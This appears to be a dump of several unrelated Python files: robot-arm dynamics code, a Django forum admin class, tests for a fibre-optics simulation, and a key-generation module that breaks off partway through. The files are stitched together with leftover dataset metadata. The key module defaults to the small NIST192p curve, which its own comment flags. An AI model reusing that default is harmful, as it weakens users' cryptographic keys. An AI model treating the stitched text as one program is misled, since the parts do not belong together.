    M_out[24] = parms[41] + x155*(parms[56]*x90 + parms[57]*x155 + x59*(-parms[67]*x198 + parms[68]*x195 + parms[69]*x200 + x208*x76 + x209*x57) + x82*(parms[66]*x198 - parms[68]*x197 + parms[69]*x193 + parms[78]*x203 - parms[79]*x199 - parms[81]*x194)) + x40*(parms[48]*x40 + parms[49]*x90 + parms[56]*x201 + x210*x59 + x212*x82) + x90*(parms[49]*x40 + parms[51]*x90 + parms[56]*x155 - x207) + x91*(-parms[56]*x40 + parms[57]*x91 - parms[66]*x196 - parms[67]*x197 - parms[69]*x201 - x208*x57 - x209*x38)
    M_out[25] = x213
    M_out[26] = x207
    M_out[27] = x211
    M_out[28] = x85
    M_out[29] = x158
    M_out[30] = x188
    M_out[31] = x213
    M_out[32] = parms[53] + x30*(parms[60]*x30 + parms[61]*x59 + x217*x57 + x218*x76) + x59*(parms[61]*x30 + parms[63]*x59 - x219)
    M_out[33] = x220
    M_out[34] = x219
    M_out[35] = x72
    M_out[36] = x149
    M_out[37] = x190
    M_out[38] = x207
    M_out[39] = x220
    M_out[40] = parms[65] + x38*(parms[72]*x38 + parms[73]*x57) + x57*(parms[73]*x38 + parms[75]*x57)
    M_out[41] = x221
    M_out[42] = x80
    M_out[43] = x141
    M_out[44] = x183
    M_out[45] = x211
    M_out[46] = x219
    M_out[47] = x221
    M_out[48] = parms[77]
#
    return M_out
def c( parms, q, dq ) :
    """Coriolis/centrifugal torque vector c(q, dq) of the 7-DOF arm.

    Machine-generated code (symbolic common-subexpression elimination);
    the x* locals are CSE temporaries and must not be reordered.

    :param parms: flat list of per-link dynamic parameters, 12 per link
        (same ordering as in :func:`M`).
    :param q: joint positions, indexable with at least 7 entries.
    :param dq: joint velocities, indexable with at least 7 entries.
    :return: list of 7 floats -- the velocity-product torques, one per
        joint, such that tau = M(q)*ddq + c(q, dq) + g(q) + f(dq).
    """
#
    c_out = [0]*7
#
    # common subexpressions (auto-generated; evaluation order matters)
    x0 = sin(q[2])
    x1 = cos(q[1])
    x2 = dq[0]*x1
    x3 = -sin(q[1])
    x4 = dq[0]*x3
    x5 = x2*x4
    x6 = ((dq[1])*(dq[1]))
    x7 = -0.03175*((x4)*(x4)) + 0.27857*x5 - 0.03175*x6
    x8 = dq[1]*x4
    x9 = dq[1]*x2
    x10 = -x9
    x11 = -x10
    x12 = 0.03175*x11 + 0.55714*x8 + 0.03175*x9
    x13 = cos(q[2])
    x14 = -x13
    x15 = x0*x7 + x12*x14
    x16 = x0*x12 + x13*x7
    x17 = dq[1]*x0 + x13*x2
    x18 = -x17
    x19 = -x4
    x20 = dq[2] + x19
    x21 = -x2
    x22 = dq[1]*x13 + x0*x21
    x23 = parms[24]*x22 + parms[25]*x18 + parms[26]*x20
    x24 = -x18
    x25 = -dq[2]*x17 - x0*x8
    x26 = -dq[2]*x22 - x13*x8
    x27 = parms[25]*x22 + parms[27]*x18 + parms[28]*x20
    x28 = cos(q[5])
    x29 = cos(q[6])
    x30 = cos(q[4])
    x31 = dq[3] + x24
    x32 = sin(q[4])
    x33 = cos(q[3])
    x34 = sin(q[3])
    x35 = x20*x34 + x22*x33
    x36 = -x30*x31 - x32*x35
    x37 = x20*x33
    x38 = x22*x34
    x39 = -dq[3]
    x40 = x11*x34 + x25*x33 + x39*(-x37 + x38)
    x41 = -x26
    x42 = -x41
    x43 = dq[4]*x36 + x30*x40 + x32*x42
    x44 = -x43
    x45 = -x25
    x46 = x11*x33 + x34*x45 + x35*x39
    x47 = -x46
    x48 = sin(q[5])
    x49 = -x32
    x50 = x30*x35 + x31*x49
    x51 = x48*x50
    x52 = x37 - x38
    x53 = dq[4] + x52
    x54 = x28*x53
    x55 = dq[5]*(x51 - x54) + x28*x44 + x47*x48
    x56 = -x55
    x57 = x35*x52
    x58 = x42 + x57
    x59 = ((x20)*(x20))
    x60 = ((x18)*(x18))
    x61 = -x59 - x60
    x62 = x15 - 0.00502*x61
    x63 = x20*x22
    x64 = x41 + x63
    x65 = -0.27857*((x2)*(x2)) + 0.03175*x5 - 0.27857*x6
    x66 = -0.00502*x64 + x65
    x67 = x33*x62 + x34*x66
    x68 = 0.27747*x58 + x67
    x69 = x31*x52
    x70 = x40 + x69
    x71 = x18*x22
    x72 = x11 + x71
    x73 = -x16
    x74 = 0.00502*x72 + x73
    x75 = 0.27747*x70 + x74
    x76 = x30*x68 + x49*x75
    x77 = ((x35)*(x35))
    x78 = ((x31)*(x31))
    x79 = -x77 - x78
    x80 = -x34
    x81 = x33*x66 + x62*x80
    x82 = 0.27747*x79 + x81
    x83 = -x28*x76 - x48*x82
    x84 = -x83
    x85 = -x28*x50 - x48*x53
    x86 = -x85
    x87 = dq[6] + x86
    x88 = -x51 + x54
    x89 = -x36
    x90 = dq[5] + x89
    x91 = sin(q[6])
    x92 = -x29*x88 - x90*x91
    x93 = x29*x90
    x94 = x88*x91
    x95 = x93 - x94
    x96 = parms[72]*x95 + parms[73]*x92 + parms[74]*x87
    x97 = -dq[4]*x50 - x30*x41 - x32*x40
    x98 = -x97
    x99 = -x98
    x100 = dq[5]*x85 + x28*x46 + x44*x48
    x101 = -x100
    x102 = dq[6]*(-x93 + x94) + x101*x29 + x91*x99
    x103 = dq[6]*x92 + x101*x91 + x29*x98
    x104 = -x30*x75 - x32*x68
    x105 = -x104
    x106 = -x76
    x107 = x106*x48 + x28*x82
    x108 = -x107
    x109 = x105*x29 + x108*x91
    x110 = parms[74]*x95 + parms[76]*x92 + parms[77]*x87
    x111 = parms[73]*x103 + parms[75]*x102 + parms[76]*x56 - parms[78]*x84 + parms[80]*x109 - x110*x95 + x87*x96
    x112 = parms[61]*x88 + parms[63]*x85 + parms[64]*x90
    x113 = parms[62]*x88 + parms[64]*x85 + parms[65]*x90
    x114 = parms[73]*x95 + parms[75]*x92 + parms[76]*x87
    x115 = -x105*x91 - x107*x29
    x116 = parms[72]*x103 + parms[73]*x102 + parms[74]*x56 + parms[79]*x84 - parms[80]*x115 + x110*x92 - x114*x87
    x117 = -x91
    x118 = parms[60]*x100 + parms[61]*x55 + parms[62]*x98 + parms[67]*x105 + parms[68]*x84 - x111*x29 - x112*x90 + x113*x85 + x116*x117
    x119 = parms[74]*x103 + parms[76]*x102 + parms[77]*x56 + parms[78]*x115 - parms[79]*x109 + x114*x95 - x92*x96
    x120 = parms[60]*x88 + parms[61]*x85 + parms[62]*x90
    x121 = parms[61]*x100 + parms[63]*x55 + parms[64]*x98 - parms[66]*x105 + parms[68]*x107 - x113*x88 - x119 + x120*x90
    x122 = -x48
    x123 = parms[49]*x50 + parms[51]*x36 + parms[52]*x53
    x124 = parms[48]*x50 + parms[49]*x36 + parms[50]*x53
    x125 = parms[50]*x43 + parms[52]*x97 + parms[53]*x46 + parms[54]*x104 + parms[55]*x106 + x118*x28 + x121*x122 + x123*x50 + x124*x89
    x126 = parms[36]*x35 + parms[37]*x52 + parms[38]*x31
    x127 = parms[38]*x35 + parms[40]*x52 + parms[41]*x31
    x128 = parms[37]*x40 + parms[39]*x46 + parms[40]*x41 - parms[42]*x74 + parms[44]*x67 + x125 + x126*x31 - x127*x35
    x129 = parms[37]*x35 + parms[39]*x52 + parms[40]*x31
    x130 = x87*x95
    x131 = x92*x95
    x132 = ((x87)*(x87))
    x133 = ((x92)*(x92))
    x134 = parms[78]*(-x132 - x133) + parms[79]*(x131 - x56) + parms[80]*(x102 + x130) + parms[81]*x109
    x135 = ((x95)*(x95))
    x136 = x87*x92
    x137 = -parms[78]*(x131 + x56) - parms[79]*(-x132 - x135) - parms[80]*(-x103 + x136) - parms[81]*x115
    x138 = x88*x90
    x139 = ((x85)*(x85))
    x140 = ((x88)*(x88))
    x141 = x85*x90
    x142 = x36*x53
    x143 = x36*x50
    x144 = ((x50)*(x50))
    x145 = ((x53)*(x53))
    x146 = parms[54]*(x143 + x46) + parms[55]*(-x144 - x145) + parms[56]*(x142 + x44) + parms[57]*x104 - parms[66]*(x138 + x56) - parms[67]*(x100 + x141) - parms[68]*(-x139 - x140) - parms[69]*x105 - x134*x29 - x137*x91
    x147 = x146*x30
    x148 = parms[62]*x100 + parms[64]*x55 + parms[65]*x98 + parms[66]*x83 + parms[67]*x108 + x111*x117 + x112*x88 + x116*x29 + x120*x86
    x149 = parms[50]*x50 + parms[52]*x36 + parms[53]*x53
    x150 = parms[49]*x43 + parms[51]*x97 + parms[52]*x46 - parms[54]*x82 + parms[56]*x76 + x124*x53 - x148 - x149*x50
    x151 = ((x90)*(x90))
    x152 = x85*x88
    x153 = parms[66]*(-x139 - x151) + parms[67]*(x152 + x99) + parms[68]*(x138 + x55) + parms[69]*x107 + x117*x134 + x137*x29
    x154 = ((x36)*(x36))
    x155 = x50*x53
    x156 = parms[66]*(x152 + x98) + parms[67]*(-x140 - x151) + parms[68]*(x101 + x141) + parms[69]*x83 - parms[78]*(-x102 + x130) - parms[79]*(x103 + x136) - parms[80]*(-x133 - x135) - parms[81]*x84
    x157 = -x28
    x158 = parms[54]*(-x145 - x154) + parms[55]*(x143 + x47) + parms[56]*(x155 + x97) + parms[57]*x76 + x122*x153 + x156*x157
    x159 = parms[48]*x43 + parms[49]*x97 + parms[50]*x46 + parms[55]*x82 + parms[56]*x105 + x118*x122 + x121*x157 - x123*x53 + x149*x36
    x160 = parms[36]*x40 + parms[37]*x46 + parms[38]*x41 + parms[43]*x74 - parms[44]*x81 + x127*x52 - x129*x31 - 0.27747*x147 + x150*x49 - 0.27747*x158*x32 + x159*x30
    x161 = ((x52)*(x52))
    x162 = x31*x35
    x163 = parms[42]*(x162 + x47) + parms[43]*x70 + parms[44]*(-x161 - x77) + parms[45]*x74 - x147 + x158*x49
    x164 = parms[26]*x25 + parms[28]*x26 + parms[29]*x11 + parms[30]*x16 - parms[31]*x15 + x128*x33 + x160*x34 + 0.00502*x163 + x22*x27 + x23*x24
    x165 = dq[1]*parms[14] + parms[12]*x2 + parms[13]*x4
    x166 = dq[1]*parms[17] + parms[14]*x2 + parms[16]*x4
    x167 = x18*x20
    x168 = ((x22)*(x22))
    x169 = parms[30]*x72 + parms[31]*(-x168 - x59) + parms[32]*(x167 + x45) + parms[33]*x16 - x163
    x170 = x0*x169
    x171 = parms[42]*(x41 + x57) + parms[43]*x79 + parms[44]*(-x40 + x69) + parms[45]*x81 + parms[54]*(x155 + x98) + parms[55]*(x142 + x43) + parms[56]*(-x144 - x154) + parms[57]*x82 + x122*x156 + x153*x28
    x172 = x158*x30
    x173 = parms[42]*(-x161 - x78) + parms[43]*x58 + parms[44]*(x162 + x46) + parms[45]*x67 + x146*x49 + x172
    x174 = parms[30]*x61 + parms[31]*(-x11 + x71) + parms[32]*(x26 + x63) + parms[33]*x15 + x171*x80 + x173*x33
    x175 = x13*x174
    x176 = parms[26]*x22 + parms[28]*x18 + parms[29]*x20
    x177 = parms[24]*x25 + parms[25]*x26 + parms[26]*x11 + parms[31]*x65 + parms[32]*x73 + x128*x80 + x160*x33 + x176*x18 - x20*x27
    x178 = -x0
    x179 = x173*x34
    x180 = x171*x33
    x181 = parms[38]*x40 + parms[40]*x46 + parms[41]*x41 + parms[42]*x81 - parms[43]*x67 - x126*x52 + x129*x35 + 0.27747*x146*x32 - x150*x30 + x159*x49 - 0.27747*x172
    x182 = parms[25]*x25 + parms[27]*x26 + parms[28]*x11 - parms[30]*x65 + parms[32]*x15 - x176*x22 + 0.00502*x179 + 0.00502*x180 - x181 + x20*x23
    x183 = dq[1]*parms[16] + parms[13]*x2 + parms[15]*x4
#
    # project the per-link wrenches onto the 7 joint axes
    c_out[0] = x1*(-dq[1]*x183 + parms[12]*x8 + parms[13]*x10 + x14*x182 + x166*x4 + 0.27857*x170 - 0.27857*x175 + x177*x178) + x3*(dq[1]*x165 + parms[13]*x8 + parms[15]*x10 - x164 + x166*x21 - 0.03175*x170 + 0.03175*x175)
    c_out[1] = parms[14]*x8 + parms[16]*x10 + 0.03175*parms[30]*x64 + 0.03175*parms[31]*(x167 + x25) + 0.03175*parms[32]*(-x168 - x60) + 0.03175*parms[33]*x65 - 0.27857*x0*x174 - 0.27857*x13*x169 + x13*x177 + x165*x19 + x178*x182 + 0.03175*x179 + 0.03175*x180 + x183*x2
    c_out[2] = x164
    c_out[3] = x181
    c_out[4] = x125
    c_out[5] = x148
    c_out[6] = x119
#
    return c_out
def f( parms, q, dq ) :
    """Return the 7-element list of joint friction torques.

    Each joint ``i`` contributes a viscous term ``dq[i]*fv_i`` plus a
    Coulomb term ``fc_i*sign(dq[i])``; the friction coefficients live at
    indices ``10 + 12*i`` (fv) and ``11 + 12*i`` (fc) of the flat
    parameter vector (see the ``dynparms`` comment in this module).
    ``q`` is accepted for interface symmetry with M/c/g but is unused.
    """
    f_out = [0]*7
    for joint in range(7):
        viscous = parms[10 + 12*joint]
        coulomb = parms[11 + 12*joint]
        f_out[joint] = dq[joint]*viscous + coulomb*sign(dq[joint])
    return f_out
def g( parms, q ) :
    """Gravity torque vector g(q) of the 7-DOF arm.

    Machine-generated code (symbolic common-subexpression elimination);
    the x* locals are CSE temporaries and must not be reordered.
    Gravity is hard-coded as 9.81 m/s^2 along the base axis.

    :param parms: flat list of per-link dynamic parameters, 12 per link
        (same ordering as in :func:`M`).
    :param q: joint positions, indexable with at least 7 entries.
    :return: list of 7 floats -- the gravity-compensation torque per
        joint.
    """
#
    g_out = [0]*7
#
    # common subexpressions (auto-generated; evaluation order matters)
    x0 = 9.81*cos(q[0])
    x1 = 9.81*sin(q[0])
    x2 = sin(q[2])
    x3 = cos(q[2])
    x4 = sin(q[1])
    x5 = x0*x4
    x6 = -x1
    x7 = -x2*x6 - x3*x5
    x8 = -x7
    x9 = cos(q[4])
    x10 = -x5
    x11 = x10*x2 + x3*x6
    x12 = cos(q[3])
    x13 = cos(q[1])
    x14 = x0*x13
    x15 = -x14
    x16 = sin(q[3])
    x17 = x11*x12 + x15*x16
    x18 = sin(q[4])
    x19 = -x17*x18 - x8*x9
    x20 = sin(q[6])
    x21 = -x11
    x22 = x12*x15 + x16*x21
    x23 = cos(q[5])
    x24 = -x8
    x25 = x17*x9 + x18*x24
    x26 = -x25
    x27 = sin(q[5])
    x28 = x22*x23 + x26*x27
    x29 = cos(q[6])
    x30 = -x19
    x31 = -x20*x30 - x28*x29
    x32 = -parms[81]*x31
    x33 = -x28
    x34 = x20*x33 + x29*x30
    x35 = parms[81]*x34
    x36 = parms[57]*x19 - parms[69]*x30 - x20*x32 - x29*x35
    x37 = x36*x9
    x38 = -x22*x27 - x23*x25
    x39 = -x38
    x40 = -parms[69]*x38 + parms[81]*x39
    x41 = -x27
    x42 = -x20
    x43 = parms[69]*x28 + x29*x32 + x35*x42
    x44 = parms[57]*x25 + x23*x40 + x41*x43
    x45 = -x18
    x46 = parms[45]*x8 - x37 + x44*x45
    x47 = parms[33]*x7 - x46
    x48 = x2*x47
    x49 = parms[79]*x39 - parms[80]*x31
    x50 = -parms[78]*x39 + parms[80]*x34
    x51 = parms[67]*x30 + parms[68]*x39 - x29*x50 + x42*x49
    x52 = parms[78]*x31 - parms[79]*x34
    x53 = -parms[66]*x30 + parms[68]*x28 - x52
    x54 = parms[55]*x22 + parms[56]*x30 - x23*x53 + x41*x51
    x55 = -x22
    x56 = parms[66]*x38 + parms[67]*x33 + x29*x49 + x42*x50
    x57 = parms[54]*x55 + parms[56]*x25 - x56
    x58 = parms[43]*x8 + parms[44]*x55 - 0.27747*x18*x44 - 0.27747*x37 + x45*x57 + x54*x9
    x59 = parms[54]*x19 + parms[55]*x26 + x23*x51 + x41*x53
    x60 = parms[42]*x24 + parms[44]*x17 + x59
    x61 = parms[30]*x7 + parms[31]*x21 + x12*x60 + x16*x58 + 0.00502*x46
    x62 = x44*x9
    x63 = parms[45]*x17 + x36*x45 + x62
    x64 = parms[45]*x22 + parms[57]*x22 + x23*x43 + x27*x40
    x65 = -x16
    x66 = parms[33]*x11 + x12*x63 + x64*x65
    x67 = x3*x66
    x68 = parms[31]*x15 + parms[32]*x8 + x12*x58 + x60*x65
    x69 = -x2
    x70 = parms[42]*x22 - parms[43]*x17 + 0.27747*x18*x36 + x45*x54 - x57*x9 - 0.27747*x62
    x71 = x16*x63
    x72 = x12*x64
    x73 = -parms[30]*x15 + parms[32]*x11 - x70 + 0.00502*x71 + 0.00502*x72
#
    # project the per-link gravity wrenches onto the 7 joint axes
    g_out[0] = parms[6]*x1 + parms[7]*x0 + x13*(parms[19]*x6 + parms[20]*x15 - x3*x73 + 0.27857*x48 - 0.27857*x67 + x68*x69) - x4*(-parms[18]*x6 + parms[20]*x5 - 0.03175*x48 - x61 + 0.03175*x67)
    g_out[1] = parms[18]*x14 + parms[19]*x10 + 0.03175*parms[33]*x15 - 0.27857*x2*x66 - 0.27857*x3*x47 + x3*x68 + x69*x73 + 0.03175*x71 + 0.03175*x72
    g_out[2] = x61
    g_out[3] = x70
    g_out[4] = x59
    g_out[5] = x56
    g_out[6] = x52
#
    return g_out
from darci_left_coriolis import *
#dynparms = [L_1xx, L_1xy, L_1xz, L_1yy, L_1yz, L_1zz, l_1x, l_1y, l_1z, m_1, fv_1, fc_1, L_2xx, L_2xy, L_2xz, L_2yy, L_2yz, L_2zz, l_2x, l_2y, l_2z, m_2, fv_2, fc_2, L_3xx, L_3xy, L_3xz, L_3yy, L_3yz, L_3zz, l_3x, l_3y, l_3z, m_3, fv_3, fc_3, L_4xx, L_4xy, L_4xz, L_4yy, L_4yz, L_4zz, l_4x, l_4y, l_4z, m_4, fv_4, fc_4, L_5xx, L_5xy, L_5xz, L_5yy, L_5yz, L_5zz, l_5x, l_5y, l_5z, m_5, fv_5, fc_5, L_6xx, L_6xy, L_6xz, L_6yy, L_6yz, L_6zz, l_6x, l_6y, l_6z, m_6, fv_6, fc_6, L_7xx, L_7xy, L_7xz, L_7yy, L_7yz, L_7zz, l_7x, l_7y, l_7z, m_7, fv_7, fc_7]
# stray dataset metadata (score columns / next-entry header) left over from extraction:
# | 1.507813 | 2
# machina/apps/forum_member/admin.py | BrendaH/django-machina | 572 | 12762490
"""
Forum member model admin definitions
====================================
This module defines admin classes used to populate the Django administration dashboard.
"""
from django.contrib import admin
from machina.core.db.models import get_model
from machina.models.fields import MarkupTextField, MarkupTextFieldWidget
ForumProfile = get_model('forum_member', 'ForumProfile')
class ForumProfileAdmin(admin.ModelAdmin):
    """ The Forum Profile model admin. """
    # Columns shown in the admin change-list view.
    list_display = ('id', 'user', 'posts_count', )
    # Sidebar filter on the denormalized post counter.
    list_filter = ('posts_count', )
    # Both the ID and the username link to the profile's edit page.
    list_display_links = ('id', 'user', )
    # Raw-ID widget for the user FK avoids rendering a select of all users.
    raw_id_fields = ('user', )
    # Admin search box matches on the related user's username.
    search_fields = ('user__username',)
    # Render every MarkupTextField (e.g. the signature) with its
    # dedicated markup-aware widget instead of a plain textarea.
    formfield_overrides = {
        MarkupTextField: {'widget': MarkupTextFieldWidget},
    }
admin.site.register(ForumProfile, ForumProfileAdmin)
# stray dataset metadata (score columns / next-entry header) left over from extraction:
# | 2.328125 | 2
# testing/test_pulse_prep.py | ibegleris/w-fopo | 0 | 12762491 | <gh_stars>0
import sys
sys.path.append('src')
from functions import *
import numpy as np
from numpy.testing import assert_allclose, assert_raises,assert_almost_equal
class Test_loss:
    """Unit tests for the ``Loss`` attenuation-function builder in
    ``functions.py``.

    NOTE(review): the test methods take ``a`` instead of the
    conventional ``self``; pytest still collects and runs them.
    The factor 4.343 converts dB/m to 1/m (10/ln(10)).
    """
    def test_loss1(a):
        """Flat profile: with amax == alphadB the attenuation is a
        constant alphadB/4.343 across the whole frequency window."""
        fv = np.linspace(200, 600, 1024)
        alphadB = np.array([1, 1])
        int_fwm = sim_parameters(2.5e-20, 2, alphadB)
        int_fwm.general_options(1e-13, 1, 1, 1)
        int_fwm.propagation_parameters(10, [0,18], 1, 100,10)
        sim_wind = sim_window(fv, 1,1, int_fwm, 1)
        loss = Loss(int_fwm, sim_wind, amax=alphadB)
        alpha_func = loss.atten_func_full(sim_wind.fv,int_fwm )
        ex = np.zeros_like(alpha_func)
        for i, a in enumerate(alpha_func):
            ex[i, :] = np.ones_like(a)*alphadB[i]/4.343
        assert_allclose(alpha_func, ex)
    def test_loss2(a):
        """With amax == 2*alphadB the attenuation peaks at the window
        edges at 2*max(alphadB)/4.343."""
        fv = np.linspace(200, 600, 1024)
        alphadB = np.array([1, 2])
        int_fwm = sim_parameters(2.5e-20, 2, alphadB)
        int_fwm.general_options(1e-13, 1, 1, 1)
        int_fwm.propagation_parameters(10, [0,18], 1, 100,10)
        sim_wind = sim_window(fv, 1,1, int_fwm, 1)
        loss = Loss(int_fwm, sim_wind, amax=2*alphadB)
        alpha_func = loss.atten_func_full(sim_wind.fv,int_fwm )
        maxim = np.max(alpha_func)
        assert maxim == 2*np.max(alphadB)/4.343
    def test_loss3(a):
        """The attenuation minimum (window centre) stays at the baseline
        min(alphadB)/4.343 regardless of amax."""
        fv = np.linspace(200, 600, 1024)
        alphadB = np.array([1, 2])
        int_fwm = sim_parameters(2.5e-20, 2, alphadB)
        int_fwm.general_options(1e-13, 1, 1, 1)
        int_fwm.propagation_parameters(10, [0,18], 1, 100,10)
        sim_wind = sim_window(fv, 1,1,int_fwm, 1)
        loss = Loss(int_fwm, sim_wind, amax=2*alphadB)
        alpha_func = loss.atten_func_full(sim_wind.fv,int_fwm )
        minim = np.min(alpha_func)
        assert minim == np.min(alphadB)/4.343
def test_fv_creator():
    """
    Checks whether the first order cascade is in the frequency window.
    """
    class int_fwm1(object):
        # Minimal stand-in for the integration-parameters object: only the
        # grid size attributes that fv_creator reads.
        def __init__(self):
            self.N = 14
            self.nt = 2**self.N
    int_fwm = int_fwm1()
    lam_p1 = 1000
    lam_s = 1200
    #fv, where = fv_creator(lam_p1, lam_s, int_fwm)
    fv, where = fv_creator(lam_p1,lam_s,0, 50, int_fwm)
    mins = np.min(1e-3*c/fv)  # NOTE(review): computed but never asserted on
    f1 = 1e-3*c/lam_p1
    fs = 1e-3*c/lam_s
    # Pump and signal frequencies must both fall strictly inside the grid.
    assert(all(i < max(fv) and i > min(fv)
               for i in (f1, fs)))
def test_noise():
    """Two consecutive draws from ``Noise.noise_func`` must differ, i.e. the
    noise source is genuinely random rather than cached."""
    class sim_windows(object):
        # Minimal stand-in for the real simulation window.
        def __init__(self):
            self.w = 10
            self.T = 0.1
            self.w0 = 9
    class int_fwms(object):
        # Minimal stand-in for the integration parameters.
        def __init__(self):
            self.nt = 1024
            self.nm = 1
    int_fwm = int_fwms()
    sim_wind = sim_windows()
    noise = Noise(int_fwm, sim_wind)
    n1 = noise.noise_func(int_fwm)
    n2 = noise.noise_func(int_fwm)
    print(n1, n2)
    # assert_raises inverts assert_almost_equal: pass only when n1 != n2.
    assert_raises(AssertionError, assert_almost_equal, n1, n2)
def test_time_frequency():
    """Round trip: scaled FFT + shift, then unshift + inverse FFT, must
    recover the original complex signal."""
    samples = 2 ** 3
    step = np.abs(np.random.rand()) * 10
    signal = 10 * (np.random.randn(samples) + 1j * np.random.randn(samples))
    spectrum = fftshift(step * fft(signal))
    recovered = ifft(ifftshift(spectrum) / step)
    assert_allclose(signal, recovered)
"----------------Raman response--------------"
#os.system('rm -r testing_data/step_index/*')
class Raman():
    """Shared fixture: loads the step-index fibre parameters once and checks
    the ``raman_object`` response in its three modes (off / load / analytic)
    against pre-computed references under ``testing/testing_data``."""
    l_vec = np.linspace(1600e-9, 1500e-9, 64)
    fv = 1e-12*c/l_vec
    dnerr = [0]
    index = 0
    master_index = 0
    a_vec = [2.2e-6]
    M1, M2, betas, Q_large = \
        fibre_parameter_loader(fv, a_vec, dnerr, index, master_index,
                               'step_index_2m', filepath='testing/testing_data/step_index/')

    def test_raman_off(self):
        # With raman 'off' no response function may be produced.
        ram = raman_object('off')
        ram.raman_load(np.random.rand(10), np.random.rand(1)[0], None,2)
        assert ram.hf == None

    def test_raman_load_1(self):
        # Measured response must match the stored reference, tiled per mode.
        ram = raman_object('on', 'load')
        #M1, M2, Q = Q_matrixes(1, 2.5e-20, 1.55e-6, 0.01)
        D = loadmat('testing/testing_data/Raman_measured.mat')
        t = D['t']
        t = np.asanyarray([t[i][0] for i in range(t.shape[0])])
        dt = D['dt'][0][0]
        hf_exact = D['hf']
        hf_exact = np.asanyarray([hf_exact[i][0]
                                  for i in range(hf_exact.shape[0])])
        hf = ram.raman_load(t, dt, self.M2,2)
        #hf_exact = np.reshape(hf_exact, hf.shape)
        hf_exact = np.tile(hf_exact, (len(self.M2[1, :]), 1))
        assert_allclose(hf, hf_exact)

    def test_raman_analytic_1(self):
        # Analytic response must match its stored reference exactly.
        ram = raman_object('on', 'analytic')
        D = loadmat('testing/testing_data/Raman_analytic.mat')
        #M1, M2, Q = Q_matrixes(1, 2.5e-20, 1.55e-6, 0.01)
        t = D['t']
        t = np.asanyarray([t[i][0] for i in range(t.shape[0])])
        dt = D['dt'][0][0]
        hf_exact = D['hf']
        hf_exact = np.asanyarray([hf_exact[i][0]
                                  for i in range(hf_exact.shape[0])])
        hf = ram.raman_load(t, dt, self.M2,2)
        assert_allclose(hf, hf_exact)

    def test_raman_load_2(self):
        # Same as test_raman_load_1 (originally for a 2-mode Q matrix).
        ram = raman_object('on', 'load')
        #M1, M2, Q = Q_matrixes(2, 2.5e-20, 1.55e-6, 0.01)
        D = loadmat('testing/testing_data/Raman_measured.mat')
        t = D['t']
        t = np.asanyarray([t[i][0] for i in range(t.shape[0])])
        dt = D['dt'][0][0]
        hf_exact = D['hf']
        hf_exact = np.asanyarray([hf_exact[i][0]
                                  for i in range(hf_exact.shape[0])])
        hf = ram.raman_load(t, dt, self.M2,2)
        hf_exact = np.tile(hf_exact, (len(self.M2[1, :]), 1))
        assert_allclose(hf, hf_exact)

    def test_raman_analytic_2(self):
        # Same as test_raman_analytic_1 (originally for a 2-mode Q matrix).
        ram = raman_object('on', 'analytic')
        D = loadmat('testing/testing_data/Raman_analytic.mat')
        #M1, M2, Q = Q_matrixes(2, 2.5e-20, 1.55e-6, 0.01)
        t = D['t']
        t = np.asanyarray([t[i][0] for i in range(t.shape[0])])
        dt = D['dt'][0][0]
        hf_exact = D['hf']
        hf_exact = np.asanyarray([hf_exact[i][0]
                                  for i in range(hf_exact.shape[0])])
        hf = ram.raman_load(t, dt, self.M2,2)
        assert_allclose(hf, hf_exact)
"----------------------------Dispersion operator--------------"
class Test_dispersion_raman(Raman):
    """Builds the dispersion operator for a two-mode window (reusing the
    fibre parameters loaded by ``Raman``) and checks it against a stored
    reference, plus internal consistency of the degenerate modes."""
    l_vec = np.linspace(1600e-9, 1500e-9, 64)
    int_fwm = sim_parameters(2.5e-20, 2, 0)
    int_fwm.general_options(1e-13, 0, 1, 1)
    int_fwm.propagation_parameters(6, [0,18], 2, 1, 1)
    sim_wind = \
        sim_window(1e-12*c/l_vec, (l_vec[0]+l_vec[-1])*0.5,
                   (l_vec[0]+l_vec[-1])*0.5, int_fwm, 10)
    loss = Loss(int_fwm, sim_wind, amax=10)
    alpha_func = loss.atten_func_full(sim_wind.fv, int_fwm)
    int_fwm.alphadB = alpha_func
    int_fwm.alpha = int_fwm.alphadB
    betas_disp = dispersion_operator(Raman.betas, int_fwm, sim_wind)

    def test_dispersion(self):
        """
        Compares the dispersion to a predetermined value.
        Not a very good test, make sure that the other one in this class
        passes.
        """
        with h5py.File('testing/testing_data/betas_test1.hdf5', 'r') as f:
            betas_exact = f.get('betas').value
        assert_allclose(self.betas_disp, betas_exact)

    def test_dispersion_same(self):
        """
        Tests if the dispersion of the first two modes (degenerate) are the same.
        """
        assert_allclose(self.betas_disp[:, 0, :], self.betas_disp[:, 1, :])
| 2.1875 | 2 |
identity.py | inorton/NULLTeamPlugin | 0 | 12762492 | import binascii
import hashlib
import os
import sys
from ecdsa import SigningKey, VerifyingKey, curves
from ecdsa import ecdsa
from ecdsa import util as ecdsautil
DEFAULT_KEYTYPE = curves.NIST192p
def get_keys_folder(datafolder):
    """Return the path of the ``keys`` sub-directory inside *datafolder*.

    :param datafolder: base data directory of the plugin
    :return: ``<datafolder>/keys``
    """
    keys_dir = os.path.join(datafolder, "keys")
    return keys_dir
def get_pub_keyfilename(datafolder):
    """Return the full path of the public identity key PEM file.

    :param datafolder: base data directory
    :return: path of ``identity.pub`` inside the keys folder
    """
    pub_path = os.path.join(get_keys_folder(datafolder), "identity.pub")
    return pub_path
def get_priv_keyfilename(datafolder):
    """Return the full path of the private identity key PEM file.

    :param datafolder: base data directory
    :return: path of ``identity.priv`` inside the keys folder
    """
    priv_path = os.path.join(get_keys_folder(datafolder), "identity.priv")
    return priv_path
def first_run(datafolder):
    """
    Do our first run and generate keys
    :param datafolder: base data directory; the keys live in a ``keys``
        sub-directory beneath it
    :return: None
    """
    keyfolder = get_keys_folder(datafolder)
    # Create the keys directory on demand.
    if not os.path.exists(keyfolder):
        os.makedirs(keyfolder)
    # Only generate a fresh identity when no private key exists yet, so an
    # existing identity is never overwritten.
    if not os.path.isfile(get_priv_keyfilename(datafolder)):
        key = genkey()
        savekey(key, keyfolder, "identity")
        sys.stderr.write("ident key generated\n")
def pubkeyhash(pubkey):
    """Return the SHA-512 hex digest of *pubkey*'s DER encoding.

    :param pubkey: a key object exposing ``to_der()``
    :return: hex digest string
    """
    der_bytes = pubkey.to_der()
    return hashlib.sha512(der_bytes).hexdigest()
def genkey():
    """
    Generate an ECDSA key
    :return: a fresh ``ecdsa.SigningKey`` on ``DEFAULT_KEYTYPE``
    """
    # NOTE(review): NIST192p (the current DEFAULT_KEYTYPE) is small by modern
    # standards; consider NIST256p or stronger if compatibility allows.
    return SigningKey.generate(curve=DEFAULT_KEYTYPE)
def savekey(keypair, path, name):
    """Write *keypair* as two PEM files under *path*.
